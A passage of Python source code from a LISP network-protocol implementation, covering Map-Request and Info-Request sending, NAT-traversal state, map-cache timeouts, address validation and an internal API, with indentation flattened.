def lisp_mac_input(packet):
return(packet)
#enddef
#
# lisp_rate_limit_map_request
#
# Check to see if we have sent a data-triggered Map-Request in the last
# LISP_MAP_REQUEST_RATE_LIMIT seconds. Return True if we should not send
# a Map-Request (rate-limit it).
#
def lisp_rate_limit_map_request(source, dest):
if (lisp_last_map_request_sent == None): return(False)
now = lisp_get_timestamp()
elapsed = now - lisp_last_map_request_sent
rate_limit = (elapsed < LISP_MAP_REQUEST_RATE_LIMIT)
if (rate_limit):
if (source != None): source = source.print_address()
dest = dest.print_address()
dprint("Rate-limiting Map-Request for {} -> {}".format(source, dest))
#endif
return(rate_limit)
#enddef
#
# lisp_send_map_request
#
# From this process, build and send a Map-Request for supplied EID.
#
def lisp_send_map_request(lisp_sockets, lisp_ephem_port, seid, deid, rloc):
global lisp_last_map_request_sent
#
# Set RLOC-probe parameters if caller wants Map-Request to be an
# RLOC-probe. We use probe_port as 4341 so we the ITR and RTR keying data
# structures can be the same.
#
probe_dest = probe_port = None
if (rloc):
probe_dest = rloc.rloc
probe_port = rloc.translated_port if lisp_i_am_rtr else LISP_DATA_PORT
#endif
#
# If there are no RLOCs found, do not build and send the Map-Request.
#
itr_rloc4, itr_rloc6, device = lisp_myrlocs
if (itr_rloc4 == None):
lprint("Suppress sending Map-Request, IPv4 RLOC not found")
return
#endif
if (itr_rloc6 == None and probe_dest != None and probe_dest.is_ipv6()):
lprint("Suppress sending Map-Request, IPv6 RLOC not found")
return
#endif
map_request = lisp_map_request()
map_request.record_count = 1
map_request.nonce = lisp_get_control_nonce()
map_request.rloc_probe = (probe_dest != None)
#
# Hold request nonce so we can match replies from xTRs that have multiple
# RLOCs. Reason being is because source address may not be the probed
# destination. And on our ETR implementation, we can get the probe request
# destination in the lisp-core/lisp-etr/lisp-rtr processes.
#
if (rloc): rloc.last_rloc_probe_nonce = map_request.nonce
sg = deid.is_multicast_address()
if (sg):
map_request.target_eid = seid
map_request.target_group = deid
else:
map_request.target_eid = deid
#endif
#
# If lookup is for an IPv6 EID or there is a signature key configured and
# there is a private key file in current directory, tell lisp_map_request()
# to sign Map-Request. For an RTR, we want to verify its map-request
# signature, so it needs to include its own IPv6 EID that matches the
# private-key file.
#
if (map_request.rloc_probe == False):
db = lisp_get_signature_eid()
if (db):
map_request.signature_eid.copy_address(db.eid)
map_request.privkey_filename = "./lisp-sig.pem"
#endif
#endif
#
# Fill in source-eid field.
#
if (seid == None or sg):
map_request.source_eid.afi = LISP_AFI_NONE
else:
map_request.source_eid = seid
#endif
#
# If ITR-RLOC is a private IPv4 address, we need it to be a global address
# for RLOC-probes.
#
# However, if we are an RTR and have a private address, the RTR is behind
# a NAT. The RLOC-probe is encapsulated with source-port 4341 to get
# through NAT. The ETR receiving the RLOC-probe request must return the
# RLOC-probe reply with same translated address/port pair (the same values
# when it encapsulates data packets).
#
if (probe_dest != None and lisp_nat_traversal and lisp_i_am_rtr == False):
if (probe_dest.is_private_address() == False):
itr_rloc4 = lisp_get_any_translated_rloc()
#endif
if (itr_rloc4 == None):
lprint("Suppress sending Map-Request, translated RLOC not found")
return
#endif
#endif
#
# Fill in ITR-RLOCs field. If we don't find an IPv6 address there is
# nothing to store in the ITR-RLOCs list. And we have to use an inner
# source address of 0::0.
#
if (probe_dest == None or probe_dest.is_ipv4()):
if (lisp_nat_traversal and probe_dest == None):
ir = lisp_get_any_translated_rloc()
if (ir != None): itr_rloc4 = ir
#endif
map_request.itr_rlocs.append(itr_rloc4)
#endif
if (probe_dest == None or probe_dest.is_ipv6()):
if (itr_rloc6 == None or itr_rloc6.is_ipv6_link_local()):
itr_rloc6 = None
else:
map_request.itr_rloc_count = 1 if (probe_dest == None) else 0
map_request.itr_rlocs.append(itr_rloc6)
#endif
#endif
#
# Decide what inner source address needs to be for the ECM. We have to
# look at the address-family of the destination EID. If the destination-EID
# is a MAC address, we will use IPv4 in the inner header with a destination
# address of 0.0.0.0.
#
if (probe_dest != None and map_request.itr_rlocs != []):
itr_rloc = map_request.itr_rlocs[0]
else:
if (deid.is_ipv4()):
itr_rloc = itr_rloc4
elif (deid.is_ipv6()):
itr_rloc = itr_rloc6
else:
itr_rloc = itr_rloc4
#endif
#endif
#
# And finally add one EID record. The EID we are looking up.
#
packet = map_request.encode(probe_dest, probe_port)
map_request.print_map_request()
#
# If this is an RLOC-probe, send directly to RLOC and not to mapping
# system. If the RLOC is behind a NAT, we need to data encapsulate it
# from port 4341 to translated destination address and port.
#
if (probe_dest != None):
if (rloc.is_rloc_translated()):
nat_info = lisp_get_nat_info(probe_dest, rloc.rloc_name)
#
# Handle gleaned RLOC case.
#
if (nat_info == None):
r = rloc.rloc.print_address_no_iid()
g = "gleaned-{}".format(r)
p = rloc.translated_port
nat_info = lisp_nat_info(r, g, p)
#endif
lisp_encapsulate_rloc_probe(lisp_sockets, probe_dest, nat_info,
packet)
return
#endif
addr_str = probe_dest.print_address_no_iid()
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#endif
#
# Get least recently used Map-Resolver. In the RTR make sure there is a
# Map-Resolver in lisp.config with no mr-name or mr-name=all.
#
local_eid = None if lisp_i_am_rtr else seid
if (lisp_decent_pull_xtr_configured()):
mr = lisp_get_decent_map_resolver(deid)
else:
mr = lisp_get_map_resolver(None, local_eid)
#endif
if (mr == None):
lprint("Cannot find Map-Resolver for source-EID {}".format( \
green(seid.print_address(), False)))
return
#endif
mr.last_used = lisp_get_timestamp()
mr.map_requests_sent += 1
if (mr.last_nonce == 0): mr.last_nonce = map_request.nonce
#
# Send ECM based Map-Request to Map-Resolver.
#
if (seid == None): seid = itr_rloc
lisp_send_ecm(lisp_sockets, packet, seid, lisp_ephem_port, deid,
mr.map_resolver)
#
# Set global timestamp for rate-limiting.
#
lisp_last_map_request_sent = lisp_get_timestamp()
#
# Do DNS lookup for Map-Resolver if "dns-name" configured.
#
mr.resolve_dns_name()
return
#enddef
#
# lisp_send_info_request
#
# Send info-request to any map-server configured or to an address supplied
# by the caller.
#
def lisp_send_info_request(lisp_sockets, dest, port, device_name):
#
# Build Info-Request message.
#
info = lisp_info()
info.nonce = lisp_get_control_nonce()
if (device_name): info.hostname += "-" + device_name
addr_str = dest.print_address_no_iid()
#
# Find next-hop for interface 'device_name' if supplied. The "ip route"
# command will produce this:
#
# pi@lisp-pi ~/lisp $ ip route | egrep "default via"
# default via 192.168.1.1 dev eth1
# default via 192.168.1.1 dev wlan0
#
# We then turn the line we want into a "ip route add" command. Then at
# the end of this function we remove the route.
#
# We do this on the ETR only so we don't have Info-Requests from the lisp-
# itr and lisp-etr process both add and delete host routes (for Info-
# Request sending purposes) at the same time.
#
added_route = False
if (device_name):
save_nh = lisp_get_host_route_next_hop(addr_str)
#
# If we found a host route for the map-server, then both the lisp-itr
# and lisp-etr processes are in this routine at the same time.
# wait for the host route to go away before proceeding. We will use
# the map-server host route as a IPC lock. For the data port, only
# the lisp-etr processes will add host route to the RTR for Info-
# Requests.
#
if (port == LISP_CTRL_PORT and save_nh != None):
while (True):
time.sleep(.01)
save_nh = lisp_get_host_route_next_hop(addr_str)
if (save_nh == None): break
#endwhile
#endif
default_routes = lisp_get_default_route_next_hops()
for device, nh in default_routes:
if (device != device_name): continue
#
# If there is a data route pointing to same next-hop, don't
# change the routing table. Otherwise, remove saved next-hop,
# add the one we want and later undo this.
#
if (save_nh != nh):
if (save_nh != None):
lisp_install_host_route(addr_str, save_nh, False)
#endif
lisp_install_host_route(addr_str, nh, True)
added_route = True
#endif
break
#endfor
#endif
#
# Encode the Info-Request message and print it.
#
packet = info.encode()
info.print_info()
#
# Send it.
#
cd = "(for control)" if port == LISP_CTRL_PORT else "(for data)"
cd = bold(cd, False)
p = bold("{}".format(port), False)
a = red(addr_str, False)
rtr = "RTR " if port == LISP_DATA_PORT else "MS "
lprint("Send Info-Request to {}{}, port {} {}".format(rtr, a, p, cd))
#
# Send packet to control port via control-sockets interface. For a 4341
# do the same via the lisp-core process but prepend a LISP data header
# to the message.
#
if (port == LISP_CTRL_PORT):
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
else:
header = lisp_data_header()
header.instance_id(0xffffff)
header = header.encode()
if (header):
packet = header + packet
#
# The NAT-traversal spec says to use port 4342 as the source port
# but that would mean return data packets will go to the lisp-core
# process. We are going to use an ephemeral port here so packets
# come to this lisp-etr process. The commented out call is to
# allow Info-Requests to use source port 4342 but will break the
# data-plane in this lispers.net implementation.
#
lisp_send(lisp_sockets, dest, LISP_DATA_PORT, packet)
# lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
#endif
#endif
#
# Remove static route to RTR if had added one and restore data route.
#
if (added_route):
lisp_install_host_route(addr_str, None, False)
if (save_nh != None): lisp_install_host_route(addr_str, save_nh, True)
#endif
return
#enddef
#
# lisp_process_info_request
#
# Process received Info-Request message. Return a Info-Reply to sender.
#
def lisp_process_info_request(lisp_sockets, packet, addr_str, sport, rtr_list):
#
# Parse Info-Request so we can return the nonce in the Info-Reply.
#
info = lisp_info()
packet = info.decode(packet)
if (packet == None): return
info.print_info()
#
# Start building the Info-Reply. Copy translated source and translated
# source port from Info-Request.
#
info.info_reply = True
info.global_etr_rloc.store_address(addr_str)
info.etr_port = sport
#
# Put Info-Request hostname (if it was encoded) in private-rloc in
# Info-Reply. Encode it as an AFI=17 distinguished-name.
#
if (info.hostname != None):
info.private_etr_rloc.afi = LISP_AFI_NAME
info.private_etr_rloc.store_address(info.hostname)
#endif
if (rtr_list != None): info.rtr_list = rtr_list
packet = info.encode()
info.print_info()
#
# Send the Info-Reply via the lisp-core process. We are sending from
# a udp46 socket, so we need to prepend ::ffff.
#
lprint("Send Info-Reply to {}".format(red(addr_str, False)))
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, sport, packet)
#
# Cache info sources so we can decide to process Map-Requests from it
# specially so we can proxy-Map-Request when the sources are behind NATs.
#
info_source = lisp_info_source(info.hostname, addr_str, sport)
info_source.cache_address_for_info_source()
return
#enddef
#
# lisp_get_signature_eid
#
# Go through the lisp_db_list (database-mappings) and return the first entry
# with signature-eid is True.
#
def lisp_get_signature_eid():
for db in lisp_db_list:
if (db.signature_eid): return(db)
#endfor
return(None)
#enddef
#
# lisp_get_any_translated_port
#
# Find a translated port so we can set it to the inner UDP port number for
# ECM Map-Requests.
#
def lisp_get_any_translated_port():
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.translated_rloc.is_null()): continue
return(rloc_entry.translated_port)
#endfor
#endfor
return(None)
#enddef
#
# lisp_get_any_translated_rloc
#
# Find a translated RLOC in any lisp_mapping() from the lisp_db_list. We need
# this to store in an RLE for (S,G) Map-Registers when the ETR is behind NAT
# devies.
#
def lisp_get_any_translated_rloc():
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.translated_rloc.is_null()): continue
return(rloc_entry.translated_rloc)
#endfor
#endfor
return(None)
#enddef
#
# lisp_get_all_translated_rlocs
#
# Return an array of each translated RLOC address in string format.
#
def lisp_get_all_translated_rlocs():
rloc_list = []
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.is_rloc_translated() == False): continue
addr = rloc_entry.translated_rloc.print_address_no_iid()
rloc_list.append(addr)
#endfor
#endfor
return(rloc_list)
#enddef
#
# lisp_update_default_routes
#
# We are an ITR and we received a new RTR-list from the Map-Server. Update
# the RLOCs of the default map-cache entries if they are different.
#
def lisp_update_default_routes(map_resolver, iid, rtr_list):
ignore_private = (os.getenv("LISP_RTR_BEHIND_NAT") != None)
new_rtr_list = {}
for rloc in rtr_list:
if (rloc == None): continue
addr = rtr_list[rloc]
if (ignore_private and addr.is_private_address()): continue
new_rtr_list[rloc] = addr
#endfor
rtr_list = new_rtr_list
prefix_list = []
for afi in [LISP_AFI_IPV4, LISP_AFI_IPV6, LISP_AFI_MAC]:
if (afi == LISP_AFI_MAC and lisp_l2_overlay == False): break
#
# Do unicast routes. We assume unicast and multicast routes are sync'ed
# with the same RLOC-set.
#
prefix = lisp_address(afi, "", 0, iid)
prefix.make_default_route(prefix)
mc = lisp_map_cache.lookup_cache(prefix, True)
if (mc):
if (mc.checkpoint_entry):
lprint("Updating checkpoint entry for {}".format( \
green(mc.print_eid_tuple(), False)))
elif (mc.do_rloc_sets_match(rtr_list.values())):
continue
#endif
mc.delete_cache()
#endif
prefix_list.append([prefix, ""])
#
# Do multicast routes.
#
group = lisp_address(afi, "", 0, iid)
group.make_default_multicast_route(group)
gmc = lisp_map_cache.lookup_cache(group, True)
if (gmc): gmc = gmc.source_cache.lookup_cache(prefix, True)
if (gmc): gmc.delete_cache()
prefix_list.append([prefix, group])
#endfor
if (len(prefix_list) == 0): return
#
# Build RLOC-set.
#
rloc_set = []
for rtr in rtr_list:
rtr_addr = rtr_list[rtr]
rloc_entry = lisp_rloc()
rloc_entry.rloc.copy_address(rtr_addr)
rloc_entry.priority = 254
rloc_entry.mpriority = 255
rloc_entry.rloc_name = "RTR"
rloc_set.append(rloc_entry)
#endfor
for prefix in prefix_list:
mc = lisp_mapping(prefix[0], prefix[1], rloc_set)
mc.mapping_source = map_resolver
mc.map_cache_ttl = LISP_MR_TTL * 60
mc.add_cache()
lprint("Add {} to map-cache with RTR RLOC-set: {}".format( \
green(mc.print_eid_tuple(), False), rtr_list.keys()))
rloc_set = copy.deepcopy(rloc_set)
#endfor
return
#enddef
#
# lisp_process_info_reply
#
# Process received Info-Reply message. Store global RLOC and translated port
# in database-mapping entries if requested.
#
# Returns [global-rloc-address, translated-port-number, new_rtr_set].
#
def lisp_process_info_reply(source, packet, store):
#
# Parse Info-Reply.
#
info = lisp_info()
packet = info.decode(packet)
if (packet == None): return([None, None, False])
info.print_info()
#
# Store RTR list.
#
new_rtr_set = False
for rtr in info.rtr_list:
addr_str = rtr.print_address_no_iid()
if (lisp_rtr_list.has_key(addr_str)):
if (lisp_register_all_rtrs == False): continue
if (lisp_rtr_list[addr_str] != None): continue
#endif
new_rtr_set = True
lisp_rtr_list[addr_str] = rtr
#endfor
#
# If an ITR, install default map-cache entries.
#
if (lisp_i_am_itr and new_rtr_set):
if (lisp_iid_to_interface == {}):
lisp_update_default_routes(source, lisp_default_iid, lisp_rtr_list)
else:
for iid in lisp_iid_to_interface.keys():
lisp_update_default_routes(source, int(iid), lisp_rtr_list)
#endfor
#endif
#endif
#
# Either store in database-mapping entries or return to caller.
#
if (store == False):
return([info.global_etr_rloc, info.etr_port, new_rtr_set])
#endif
#
# If no private-etr-rloc was supplied in the Info-Reply, use the global
# RLOC for all private RLOCs in the database-mapping entries.
#
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
rloc = rloc_entry.rloc
interface = rloc_entry.interface
if (interface == None):
if (rloc.is_null()): continue
if (rloc.is_local() == False): continue
if (info.private_etr_rloc.is_null() == False and
rloc.is_exact_match(info.private_etr_rloc) == False):
continue
#endif
elif (info.private_etr_rloc.is_dist_name()):
rloc_name = info.private_etr_rloc.address
if (rloc_name != rloc_entry.rloc_name): continue
#endif
eid_str = green(db.eid.print_prefix(), False)
rloc_str = red(rloc.print_address_no_iid(), False)
rlocs_match = info.global_etr_rloc.is_exact_match(rloc)
if (rloc_entry.translated_port == 0 and rlocs_match):
lprint("No NAT for {} ({}), EID-prefix {}".format(rloc_str,
interface, eid_str))
continue
#endif
#
# Nothing changed?
#
translated = info.global_etr_rloc
stored = rloc_entry.translated_rloc
if (stored.is_exact_match(translated) and
info.etr_port == rloc_entry.translated_port): continue
lprint("Store translation {}:{} for {} ({}), EID-prefix {}". \
format(red(info.global_etr_rloc.print_address_no_iid(), False),
info.etr_port, rloc_str, interface, eid_str))
rloc_entry.store_translated_rloc(info.global_etr_rloc,
info.etr_port)
#endfor
#endfor
return([info.global_etr_rloc, info.etr_port, new_rtr_set])
#enddef
#
# lisp_test_mr
#
# Send Map-Requests for arbitrary EIDs to (1) prime the map-cache and to (2)
# test the RTT of the Map-Resolvers.
#
def lisp_test_mr(lisp_sockets, port):
return
lprint("Test Map-Resolvers")
eid = lisp_address(LISP_AFI_IPV4, "", 0, 0)
eid6 = lisp_address(LISP_AFI_IPV6, "", 0, 0)
#
# Send 10.0.0.1 and 192.168.0.1
#
eid.store_address("10.0.0.1")
lisp_send_map_request(lisp_sockets, port, None, eid, None)
eid.store_address("192.168.0.1")
lisp_send_map_request(lisp_sockets, port, None, eid, None)
#
# Send 0100::1 and 8000::1.
#
eid6.store_address("0100::1")
lisp_send_map_request(lisp_sockets, port, None, eid6, None)
eid6.store_address("8000::1")
lisp_send_map_request(lisp_sockets, port, None, eid6, None)
#
# Restart periodic timer.
#
lisp_test_mr_timer = threading.Timer(LISP_TEST_MR_INTERVAL, lisp_test_mr,
[lisp_sockets, port])
lisp_test_mr_timer.start()
return
#enddef
#
# lisp_update_local_rloc
#
# Check if local RLOC has changed and update the lisp_rloc() entry in
# lisp_db(). That is check to see if the private address changed since this
# ETR could have moved to another NAT or the same NAT device reasssigned a
# new private address.
#
# This function is also used when the interface address is not private. It
# allows us to change the RLOC when the address changes.
#
def lisp_update_local_rloc(rloc):
if (rloc.interface == None): return
addr = lisp_get_interface_address(rloc.interface)
if (addr == None): return
old = rloc.rloc.print_address_no_iid()
new = addr.print_address_no_iid()
if (old == new): return
lprint("Local interface address changed on {} from {} to {}".format( \
rloc.interface, old, new))
rloc.rloc.copy_address(addr)
lisp_myrlocs[0] = addr
return
#enddef
#
# lisp_update_encap_port
#
# Check to see if the encapsulation port changed for an RLOC for the supplied
# map-cache entry.
#
def lisp_update_encap_port(mc):
for rloc in mc.rloc_set:
nat_info = lisp_get_nat_info(rloc.rloc, rloc.rloc_name)
if (nat_info == None): continue
if (rloc.translated_port == nat_info.port): continue
lprint(("Encap-port changed from {} to {} for RLOC {}, " + \
"EID-prefix {}").format(rloc.translated_port, nat_info.port,
red(rloc.rloc.print_address_no_iid(), False),
green(mc.print_eid_tuple(), False)))
rloc.store_translated_rloc(rloc.rloc, nat_info.port)
#endfor
return
#enddef
#
# lisp_timeout_map_cache_entry
#
# Check if a specific map-cache entry needs to be removed due timer expiry.
# If entry does not time out, go through RLOC-set to see if the encapsulation
# port needs updating.
#
# If "program-hardware = yes" is configured, then check a platform specific
# flag (an Arista platform specific command).
#
def lisp_timeout_map_cache_entry(mc, delete_list):
if (mc.map_cache_ttl == None):
lisp_update_encap_port(mc)
return([True, delete_list])
#endif
now = lisp_get_timestamp()
#
# Check refresh timers. Native-Forward entries just return if active,
# else check for encap-port changes for NAT entries. Then return if
# entry still active.
#
if (mc.last_refresh_time + mc.map_cache_ttl > now):
if (mc.action == LISP_NO_ACTION): lisp_update_encap_port(mc)
return([True, delete_list])
#endif
#
# Timed out.
#
elapsed = lisp_print_elapsed(mc.last_refresh_time)
prefix_str = mc.print_eid_tuple()
lprint("Map-cache entry for EID-prefix {} has {}, had uptime of {}". \
format(green(prefix_str, False), bold("timed out", False), elapsed))
#
# Add to delete-list to remove after this loop.
#
delete_list.append(mc)
return([True, delete_list])
#enddef
#
# lisp_timeout_map_cache_walk
#
# Walk the entries in the lisp_map_cache(). And then subsequently walk the
# entries in lisp_mapping.source_cache().
#
def lisp_timeout_map_cache_walk(mc, parms):
delete_list = parms[0]
checkpoint_list = parms[1]
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()):
status, delete_list = lisp_timeout_map_cache_entry(mc, delete_list)
if (delete_list == [] or mc != delete_list[-1]):
checkpoint_list = lisp_write_checkpoint_entry(checkpoint_list, mc)
#endif
return([status, parms])
#endif
if (mc.source_cache == None): return([True, parms])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
parms = mc.source_cache.walk_cache(lisp_timeout_map_cache_entry, parms)
return([True, parms])
#enddef
#
# lisp_timeout_map_cache
#
# Look at TTL expiration for each map-cache entry.
#
def lisp_timeout_map_cache(lisp_map_cache):
parms = [[], []]
parms = lisp_map_cache.walk_cache(lisp_timeout_map_cache_walk, parms)
#
# Now remove from lisp_referral_cache all the timed out entries on the
# delete_list[].
#
delete_list = parms[0]
for mc in delete_list: mc.delete_cache()
#
# Write contents of checkpoint_list array to checkpoint file.
#
checkpoint_list = parms[1]
lisp_checkpoint(checkpoint_list)
return
#enddef
#
# lisp_store_nat_info
#
# Store source RLOC and port number of an Info-Request packet sent to port
# 4341 where the packet was translated by a NAT device.
#
# The lisp_nat_state_info{} is a dictionary array with an array a lisp_nat_
# info() values. We keep all the current and previous NAT state associated
# with the Info-Request hostname. This is so we can track how much movement
# is occuring.
#
# Return True if the address and port number changed so the caller can fix up
# RLOCs in map-cache entries.
#
def lisp_store_nat_info(hostname, rloc, port):
addr_str = rloc.print_address_no_iid()
msg = "{} NAT state for {}, RLOC {}, port {}".format("{}",
blue(hostname, False), red(addr_str, False), port)
new_nat_info = lisp_nat_info(addr_str, hostname, port)
if (lisp_nat_state_info.has_key(hostname) == False):
lisp_nat_state_info[hostname] = [new_nat_info]
lprint(msg.format("Store initial"))
return(True)
#endif
#
# The youngest entry is always the first element. So check to see if this
# is a refresh of the youngest (current) entry.
#
nat_info = lisp_nat_state_info[hostname][0]
if (nat_info.address == addr_str and nat_info.port == port):
nat_info.uptime = lisp_get_timestamp()
lprint(msg.format("Refresh existing"))
return(False)
#endif
#
# So the youngest entry is not the newest entry. See if it exists as
# an old entry. If not, we prepend the new state, otherwise, we prepend
# the new state and remove the old state from the array.
#
old_entry = None
for nat_info in lisp_nat_state_info[hostname]:
if (nat_info.address == addr_str and nat_info.port == port):
old_entry = nat_info
break
#endif
#endfor
if (old_entry == None):
lprint(msg.format("Store new"))
else:
lisp_nat_state_info[hostname].remove(old_entry)
lprint(msg.format("Use previous"))
#endif
existing = lisp_nat_state_info[hostname]
lisp_nat_state_info[hostname] = [new_nat_info] + existing
return(True)
#enddef
#
# lisp_get_nat_info
#
# Do lookup to get port number to store in map-cache entry as the encapsulation
# port.
#
def lisp_get_nat_info(rloc, hostname):
if (lisp_nat_state_info.has_key(hostname) == False): return(None)
addr_str = rloc.print_address_no_iid()
for nat_info in lisp_nat_state_info[hostname]:
if (nat_info.address == addr_str): return(nat_info)
#endfor
return(None)
#enddef
#
# lisp_build_info_requests
#
# Check database-mappings to see if there are any private local RLOCs. If
# so, get the translated global RLOC by sending an Info-Request to a
# Map-Server.
#
# To support multi-homing, that is more than one "interface = <device>"
# rloc sub-command clause, you need the following default routes in the
# kernel so Info-Requests can be load-split across interfaces:
#
# sudo ip route add default via <next-hop> dev eth0
# sudo ip route append default via <another-or-same-next-hop> dev eth1
#
# By having these default routes, we can get the next-hop address for the
# NAT interface we are sending the 4341 Info-Request to install a emphemeral
# static route to force the Info-Request to go out a specific interface.
#
def lisp_build_info_requests(lisp_sockets, dest, port):
if (lisp_nat_traversal == False): return
#
# Send Info-Request to each configured Map-Resolver and exit loop.
# If we don't find one, try finding a Map-Server. We may send Info-
# Request to an RTR to open up NAT state.
#
dest_list = []
mr_list = []
if (dest == None):
for mr in lisp_map_resolvers_list.values():
mr_list.append(mr.map_resolver)
#endif
dest_list = mr_list
if (dest_list == []):
for ms in lisp_map_servers_list.values():
dest_list.append(ms.map_server)
#endfor
#endif
if (dest_list == []): return
else:
dest_list.append(dest)
#endif
#
# Find the NAT-traversed interfaces.
#
rloc_list = {}
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
lisp_update_local_rloc(rloc_entry)
if (rloc_entry.rloc.is_null()): continue
if (rloc_entry.interface == None): continue
addr = rloc_entry.rloc.print_address_no_iid()
if (addr in rloc_list): continue
rloc_list[addr] = rloc_entry.interface
#endfor
#endfor
if (rloc_list == {}):
lprint('Suppress Info-Request, no "interface = <device>" RLOC ' + \
"found in any database-mappings")
return
#endif
#
# Send out Info-Requests out the NAT-traversed interfaces that have
# addresses assigned on them.
#
for addr in rloc_list:
interface = rloc_list[addr]
a = red(addr, False)
lprint("Build Info-Request for private address {} ({})".format(a,
interface))
device = interface if len(rloc_list) > 1 else None
for dest in dest_list:
lisp_send_info_request(lisp_sockets, dest, port, device)
#endfor
#endfor
#
# Do DNS lookup for Map-Resolver if "dns-name" configured.
#
if (mr_list != []):
for mr in lisp_map_resolvers_list.values():
mr.resolve_dns_name()
#endfor
#endif
return
#enddef
#
# lisp_valid_address_format
#
# Check to see if the string is a valid address. We are validating IPv4, IPv6
# and MAC addresses.
#
def lisp_valid_address_format(kw, value):
if (kw != "address"): return(True)
#
# Check if address is a Distinguished-Name. Must have single quotes.
# Check this first because names could have ".", ":", or "-" in them.
#
if (value[0] == "'" and value[-1] == "'"): return(True)
#
# Do IPv4 test for dotted decimal x.x.x.x.
#
if (value.find(".") != -1):
addr = value.split(".")
if (len(addr) != 4): return(False)
for byte in addr:
if (byte.isdigit() == False): return(False)
if (int(byte) > 255): return(False)
#endfor
return(True)
#endif
#
# Test for a geo-prefix. They have N, S, W, E characters in them.
#
if (value.find("-") != -1):
addr = value.split("-")
for i in ["N", "S", "W", "E"]:
if (i in addr):
if (len(addr) < 8): return(False)
return(True)
#endif
#endfor
#endif
#
# Do MAC test in format xxxx-xxxx-xxxx.
#
if (value.find("-") != -1):
addr = value.split("-")
if (len(addr) != 3): return(False)
for hexgroup in addr:
try: int(hexgroup, 16)
except: return(False)
#endfor
return(True)
#endif
#
# Do IPv6 test in format aaaa:bbbb::cccc:dddd
#
if (value.find(":") != -1):
addr = value.split(":")
if (len(addr) < 2): return(False)
found_null = False
count = 0
for hexgroup in addr:
count += 1
if (hexgroup == ""):
if (found_null):
if (len(addr) == count): break
if (count > 2): return(False)
#endif
found_null = True
continue
#endif
try: int(hexgroup, 16)
except: return(False)
#endfor
return(True)
#endif
#
# Do E.164 format test. The address is a "+" followed by <= 15 BCD digits.
#
if (value[0] == "+"):
addr = value[1::]
for digit in addr:
if (digit.isdigit() == False): return(False)
#endfor
return(True)
#endif
return(False)
#enddef
#
# lisp_process_api
#
# Used by all lisp processes (not the lisp-core process) to read data
# structures and return them to the LISP process.
#
# Variable data_structure has following format:
#
# "<data-structure-name>%{<dictionary-array-of-parameters>}"
#
def lisp_process_api(process, lisp_socket, data_structure):
api_name, parms = data_structure.split("%")
lprint("Process API request '{}', parameters: '{}'".format(api_name,
parms))
data = []
if (api_name == "map-cache"):
if (parms == ""):
data = lisp_map_cache.walk_cache(lisp_process_api_map_cache, data)
else:
data = lisp_process_api_map_cache_entry(json.loads(parms))
#endif
#endif
if (api_name == "site-cache"):
if (parms == ""):
data = lisp_sites_by_eid.walk_cache(lisp_process_api_site_cache,
data)
else:
data = lisp_process_api_site_cache_entry(json.loads(parms))
#endif
#endif
if (api_name == "map-server"):
parms = {} if (parms == "") else json.loads(parms)
data = lisp_process_api_ms_or_mr(True, parms)
#endif
if (api_name == "map-resolver"):
parms = {} if (parms == "") else json.loads(parms)
data = lisp_process_api_ms_or_mr(False, parms)
#endif
if (api_name == "database-mapping"):
data = lisp_process_api_database_mapping()
#endif
#
# Send IPC back to lisp-core process.
#
data = json.dumps(data)
ipc = lisp_api_ipc(process, data)
lisp_ipc(ipc, lisp_socket, "lisp-core")
return
#enddef
#
# lisp_process_api_map_cache
#
# Return map-cache to API caller.
#
def lisp_process_api_map_cache(mc, data):
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()): return(lisp_gather_map_cache_data(mc, data))
if (mc.source_cache == None): return([True, data])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
data = mc.source_cache.walk_cache(lisp_gather_map_cache_data, data)
return([True, data])
#enddef
#
# lisp_gather_map_cache_data
#
# Return map-cache to API caller.
#
def lisp_gather_map_cache_data(mc, data):
entry = {}
entry["instance-id"] = str(mc.eid.instance_id)
entry["eid-prefix"] = mc.eid.print_prefix_no_iid()
if (mc.group.is_null() == False):
entry["group-prefix"] = mc.group.print_prefix_no_iid()
#endif
entry["uptime"] = lisp_print_elapsed(mc.uptime)
entry["expires"] = lisp_print_elapsed(mc.uptime)
entry["action"] = lisp_map_reply_action_string[mc.action]
entry["ttl"] = "--" if mc.map_cache_ttl == None else \
str(mc.map_cache_ttl / 60)
#
# Encode in RLOC-set which is an array of entries.
#
rloc_set = []
for rloc in mc.rloc_set:
r = {}
if (rloc.rloc_exists()):
r["address"] = rloc.rloc.print_address_no_iid()
#endif
if (rloc.translated_port != 0):
r["encap-port"] = str(rloc.translated_port)
#endif
r["state"] = rloc.print_state()
if (rloc.geo): r["geo"] = rloc.geo.print_geo()
if (rloc.elp): r["elp"] = rloc.elp.print_elp(False)
if (rloc.rle): r["rle"] = rloc.rle.print_rle(False)
if (rloc.json): r["json"] = rloc.json.print_json(False)
if (rloc.rloc_name): r["rloc-name"] = rloc.rloc_name
stats = rloc.stats.get_stats(False, False)
if (stats): r["stats"] = stats
r["uptime"] = lisp_print_elapsed(rloc.uptime)
r["upriority"] = str(rloc.priority)
r["uweight"] = str(rloc.weight)
r["mpriority"] = str(rloc.mpriority)
r["mweight"] = str(rloc.mweight)
reply = rloc.last_rloc_probe_reply
if (reply):
r["last-rloc-probe-reply"] = lisp_print_elapsed(reply)
r["rloc-probe-rtt"] = str(rloc.rloc_probe_rtt)
#endif
r["rloc-hop-count"] = rloc.rloc_probe_hops
r["recent-rloc-hop-counts"] = rloc.recent_rloc_probe_hops
recent_rtts = []
for rtt in rloc.recent_rloc_probe_rtts: recent_rtts.append(str(rtt))
r["recent-rloc-probe-rtts"] = recent_rtts
rloc_set.append(r)
#endfor
entry["rloc-set"] = rloc_set
data.append(entry)
return([True, data])
#enddef
#
# lisp_process_api_map_cache_entry
#
# Parse API parameters in dictionary array, do longest match lookup.
#
def lisp_process_api_map_cache_entry(parms):
iid = parms["instance-id"]
iid = 0 if (iid == "") else int(iid)
#
# Get EID or source of (S,G).
#
